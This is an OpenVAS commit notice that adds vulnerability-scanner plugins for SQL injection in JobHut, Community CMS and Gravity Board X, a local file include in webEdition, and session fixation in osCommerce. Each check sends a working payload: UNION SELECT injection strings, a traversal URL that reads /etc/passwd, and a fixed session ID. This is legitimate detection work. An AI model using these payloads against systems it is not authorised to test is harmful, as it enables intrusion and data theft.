[Openvas-commits] r3026 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Sun Apr 5 13:52:06 CEST 2009
Author: mime
Date: 2009-04-05 13:52:05 +0200 (Sun, 05 Apr 2009)
New Revision: 3026
Added:
trunk/openvas-plugins/scripts/JobHut_34300.nasl
trunk/openvas-plugins/scripts/community_cms_34303.nasl
trunk/openvas-plugins/scripts/gravity_board_x_34370.nasl
trunk/openvas-plugins/scripts/gravity_board_x_detect.nasl
trunk/openvas-plugins/scripts/oscommerce_34348.nasl
trunk/openvas-plugins/scripts/webEdition_34323.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-04-04 22:29:39 UTC (rev 3025)
+++ trunk/openvas-plugins/ChangeLog 2009-04-05 11:52:05 UTC (rev 3026)
@@ -1,3 +1,12 @@
+2009-04-05 Michael Meyer <mime at gmx.de>
+ * scripts/gravity_board_x_detect.nasl,
+ scripts/oscommerce_34348.nasl,
+ scripts/JobHut_34300.nasl,
+ scripts/community_cms_34303.nasl,
+ scripts/webEdition_34323.nasl,
+ scripts/gravity_board_x_34370.nasl:
+ Added new plugins
+
2009-05-04 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/remote-MS07-040.nasl
* scripts/remote-MS05-004.nasl:
Added: trunk/openvas-plugins/scripts/JobHut_34300.nasl
===================================================================
--- trunk/openvas-plugins/scripts/JobHut_34300.nasl 2009-04-04 22:29:39 UTC (rev 3025)
+++ trunk/openvas-plugins/scripts/JobHut_34300.nasl 2009-04-05 11:52:05 UTC (rev 3026)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# JobHut 'browse.php' SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100102);
+ script_bugtraq_id(34300);
+ script_version ("1.0");
+
+ script_name(english:"JobHut 'browse.php' SQL Injection Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ JobHut is prone to an SQL-injection vulnerability because it fails
+ to sufficiently sanitize user-supplied data before using it in an
+ SQL query.
+
+ Exploiting this issue could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ JobHut 1.2 is vulnerable; other versions may also be affected.
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if JobHut is prone to SQL Injection Vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web application abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/jobs",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, '/browse.php?pk=-1%20union%20select%201234567,2--');
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if ( egrep(pattern:"Results [0-9-]+ of 1234567 job\(s\) found", string: buf) )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/JobHut_34300.nasl
___________________________________________________________________
Name: svn:keywords
+ Id
Added: trunk/openvas-plugins/scripts/community_cms_34303.nasl
===================================================================
--- trunk/openvas-plugins/scripts/community_cms_34303.nasl 2009-04-04 22:29:39 UTC (rev 3025)
+++ trunk/openvas-plugins/scripts/community_cms_34303.nasl 2009-04-05 11:52:05 UTC (rev 3026)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Community CMS 'index.php' and 'view.php' SQL Injection
+# Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100104);
+ script_bugtraq_id(34303);
+ script_version ("1.0");
+
+ script_name(english:"Community CMS 'index.php' and 'view.php' SQL Injection Vulnerabilities");
+ desc["english"] = "
+
+ Overview:
+ Community CMS is prone to multiple SQL-injection vulnerabilities
+ because it fails to sufficiently sanitize user-supplied data before
+ using it in SQL queries.
+
+ Exploiting these issues could allow an attacker to compromise the
+ application, access or modify data, or exploit latent
+ vulnerabilities in the underlying database.
+
+ Community CMS 0.5 is vulnerable; earlier versions may also be
+ affected.
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Community CMS is prone to SQL Injection Vulnerabilities");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web application abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/cms",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, '/view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9');
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if ( egrep(pattern:"OpenVAS-SQL-Injection-Test", string: buf) )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/community_cms_34303.nasl
___________________________________________________________________
Name: svn:keywords
+ Id
Added: trunk/openvas-plugins/scripts/gravity_board_x_34370.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gravity_board_x_34370.nasl 2009-04-04 22:29:39 UTC (rev 3025)
+++ trunk/openvas-plugins/scripts/gravity_board_x_34370.nasl 2009-04-05 11:52:05 UTC (rev 3026)
@@ -0,0 +1,105 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Gravity Board X Multiple SQL Injection Vulnerabilities and Remote
+# Command Execution Vulnerability
+#
+# Authors
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100101);
+ script_bugtraq_id(34370);
+ script_version ("1.0");
+
+ script_name(english:"Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ Gravity Board X is prone to multiple SQL-injection vulnerabilities
+ and a remote command-execution because it fails to sufficiently
+ sanitize user-supplied data before using it in an SQL query.
+
+ Exploiting these issues could allow an attacker to execute arbitrary
+ code, compromise the application. access or modify data, or exploit
+ latent vulnerabilities in the underlying database.
+
+ Gravity Board X 2.0 is vulnerable; other versions may also be
+ affected.
+
+ See also:
+ http://www.securityfocus.com/bid/34370
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if Gravity Board X is vulnerable to Multiple Vulnerabilities");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web application abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("gravity_board_x_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!version = get_kb_item(string("www/", port, "/GravityX")))exit(0);
+if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);
+
+vers = matches[1];
+dir = matches[2];
+
+if(!isnull(vers) && vers >!< "unknown") {
+
+ if(ereg(pattern: "^2.0 BETA$", string: vers)) {
+ VULN = TRUE;
+ }
+
+} else {
+# No version found, try to exploit.
+ if(!isnull(dir)) {
+ url = string(dir, "/index.php?action=viewboard&board_id=-1%27+union+select+0,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,2+from+gbx_members+where+1=%271");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+ if(egrep(pattern:"OpenVAS-SQL-Injection-Test", string: buf))
+ {
+ VULN = TRUE;
+ }
+ }
+}
+
+if(VULN) {
+
+ security_warning(port:port);
+ exit(0);
+
+}
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/gravity_board_x_34370.nasl
___________________________________________________________________
Name: svn:keywords
+ Id
Added: trunk/openvas-plugins/scripts/gravity_board_x_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gravity_board_x_detect.nasl 2009-04-04 22:29:39 UTC (rev 3025)
+++ trunk/openvas-plugins/scripts/gravity_board_x_detect.nasl 2009-04-05 11:52:05 UTC (rev 3026)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Gravity Board X Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc["english"] = "
+
+ Overview:
+ This host is running Gravity Board X, a free forum software written
+ in PHP and MySQL.
+
+ See also:
+ http://www.gravityboardx.com/
+
+ Risk factor : None";
+
+if (description)
+{
+ script_id(100100);
+ script_version ("1.0");
+
+ script_name(english:"Gravity Board X Detection");
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Checks for the presence of Gravity Board X");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"General");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/gravity","/forum","/board",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if(egrep(pattern: ".*Gravity Board X.*", string: buf, icase: TRUE) && egrep(pattern: "Powered by", string: buf, icase: TRUE))
+ {
+ if(strlen(dir)>0) {
+ install=dir;
+ } else {
+ install=string("/");
+ }
+
+ vers = string("unknown");
+
+ ### try to get version
+ version = eregmatch(string: buf, pattern: "<a href=[^>]+>Gravity Board X</a>.*v([0-9.]+ *[BETA]*)",icase:TRUE, multiline: TRUE);
+
+ if ( !isnull(version[1]) ) {
+ vers=chomp(version[1]);
+ }
+
+ set_kb_item(name: string("www/", port, "/GravityX"), value: string(vers," under ",install));
+
+ info = string("None\n\nGravity Board X Version '");
+ info += string(vers);
+ info += string("' was detected on the remote host in the following directory(s):\n\n");
+ info += string(install, "\n");
+
+ desc = ereg_replace(
+ string:desc["english"],
+ pattern:"None$",
+ replace:info
+ );
+
+ security_note(port:port,data:desc);
+ exit(0);
+
+ }
+}
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/gravity_board_x_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Id
Added: trunk/openvas-plugins/scripts/oscommerce_34348.nasl
===================================================================
--- trunk/openvas-plugins/scripts/oscommerce_34348.nasl 2009-04-04 22:29:39 UTC (rev 3025)
+++ trunk/openvas-plugins/scripts/oscommerce_34348.nasl 2009-04-05 11:52:05 UTC (rev 3026)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# osCommerce 'oscid' Session Fixation Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100099);
+ script_bugtraq_id(34348);
+ script_version ("1.0");
+
+ script_name(english:"osCommerce 'oscid' Session Fixation Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ osCommerce is prone to a session-fixation vulnerability.
+
+ Attackers can exploit this issue to hijack a user's session and gain
+ unauthorized access to the affected application.
+
+ The following are vulnerable:
+
+ osCommerce 2.2
+ osCommerce 3.0 Beta
+
+ Other versions may also be affected.
+
+ See also:
+ http://www.securityfocus.com/bid/34348
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if osCommerce is vulnerable to Session Fixation");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web application abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("oscommerce_detect.nasl");
+ script_require_keys("Software/osCommerce");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_kb_list("Software/osCommerce/dir"))exit(0);
+
+foreach d (dir)
+{
+ url = string(d, "/index.php?osCsid=a815a815a815a815");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )exit(0);
+ if(egrep(pattern:"[a-zA-Z]+\.php\?osCsid=a815a815a815a815", string: buf) && !egrep(pattern:"Set-Cookie: osCsid=[a-zA-Z0-9]+" , string: buf) )
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/oscommerce_34348.nasl
___________________________________________________________________
Name: svn:keywords
+ Id
Added: trunk/openvas-plugins/scripts/webEdition_34323.nasl
===================================================================
--- trunk/openvas-plugins/scripts/webEdition_34323.nasl 2009-04-04 22:29:39 UTC (rev 3025)
+++ trunk/openvas-plugins/scripts/webEdition_34323.nasl 2009-04-05 11:52:05 UTC (rev 3026)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# webEdition CMS 'WE_LANGUAGE' Parameter Local File Include
+# Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Michael Meyer
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100103);
+ script_bugtraq_id(34323);
+ script_version ("1.0");
+
+ script_name(english:"webEdition CMS 'WE_LANGUAGE' Parameter Local File Include Vulnerability");
+ desc["english"] = "
+
+ Overview:
+ webEdition CMS is prone to a local file-include vulnerability
+ because it fails to properly sanitize user-supplied input.
+
+ An attacker can exploit this vulnerability to view and execute
+ arbitrary local files in the context of the webserver process. This
+ may aid in further attacks.
+
+ webEdition CMS 6.0.0.4 is vulnerable; other versions may also be
+ affected.
+
+ Risk factor : Medium";
+
+ script_description(english:desc["english"]);
+ script_summary(english:"Determine if webEdition is prone to Local File Include Vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"Web application abuses");
+ script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer");
+ script_dependencie("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port)) exit(0);
+
+dir = make_list("/webEdition","/cms",cgi_dirs());
+
+foreach d (dir)
+{
+ url = string(d, '/index.php?WE_LANGUAGE=../../../../../../../../etc/passwd%00');
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if ( egrep(pattern:"root:.*:0:[01]:.*", string: buf) )
+
+ {
+ security_warning(port:port);
+ exit(0);
+ }
+}
+
+exit(0);
Property changes on: trunk/openvas-plugins/scripts/webEdition_34323.nasl
___________________________________________________________________
Name: svn:keywords
+ Id
More information about the Openvas-commits
mailing list